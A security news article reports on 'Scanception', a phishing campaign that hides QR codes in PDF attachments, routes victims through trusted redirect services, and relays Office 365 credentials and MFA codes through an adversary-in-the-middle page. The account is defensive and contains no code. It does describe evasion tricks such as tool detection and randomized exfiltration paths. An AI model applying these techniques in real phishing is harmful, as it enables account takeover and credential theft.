New QR Code Attack Via PDFs Evades Detection Systems and Harvest Credentials

A sophisticated phishing campaign dubbed “Scanception” has emerged as a significant threat to enterprise security, leveraging QR codes embedded in PDF attachments to bypass traditional email security measures and harvest user credentials.

The attack represents a concerning evolution in social engineering tactics, specifically targeting the growing reliance on mobile devices for quick access to digital resources through QR code scanning.

The campaign operates through a multi-stage attack chain that begins with carefully crafted phishing emails containing PDF attachments designed to mimic legitimate business communications.

These documents, often masquerading as HR handbooks or corporate announcements, contain professionally formatted content complete with authentic-looking logos and organizational branding to establish trust with potential victims.

What makes this attack particularly insidious is its strategic placement of malicious QR codes on the final pages of multi-page PDF documents, a technique that effectively circumvents automated security scanners which typically analyze only the initial pages of attachments.

Cyble analysts identified over 600 unique phishing PDFs associated with this campaign within just three months, with nearly 80% showing zero detections on VirusTotal at the time of analysis.

The technical sophistication of Scanception extends beyond simple QR code deployment.

Once victims scan the embedded codes, they are redirected through a complex network of legitimate redirect services including YouTube, Google, Bing, and Cisco platforms, which masks the malicious intent behind trusted domains.

This abuse of reputable infrastructure significantly reduces the likelihood of detection by reputation-based security systems.

Advanced Evasion and Credential Harvesting Mechanisms

The phishing infrastructure demonstrates remarkable technical complexity in its evasion capabilities.

Upon reaching the fake Office 365 login portal, the malicious website employs sophisticated detection mechanisms to identify automated analysis tools.

The site continuously monitors for the presence of security research tools such as Selenium, PhantomJS, or Burp Suite using JavaScript functions that execute every 100 milliseconds.

When such tools are detected, the system immediately redirects users to “about:blank”, effectively terminating the attack chain and preventing further analysis.

The credential harvesting process utilizes an Adversary-in-the-Middle (AITM) approach through a function called sendAndReceive(), which orchestrates real-time communication with attacker-controlled infrastructure.

Stolen credentials are exfiltrated via POST requests to dynamically generated endpoints created using the randroute() function combined with the randexp.min.js library from GitHub, enabling randomized URL paths that reduce signature-based detection effectiveness.

The campaign’s multi-factor authentication bypass capability represents its most concerning aspect, as the infrastructure maintains an open communication channel to prompt victims for additional authentication data including 2FA tokens, email verification codes, and SMS-delivered one-time passwords.

This stepwise approach enables complete session hijacking and account takeover, allowing attackers to maintain long-term persistence within compromised Microsoft 365 environments while successfully bypassing modern security controls through real-time credential relay to legitimate authentication services.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now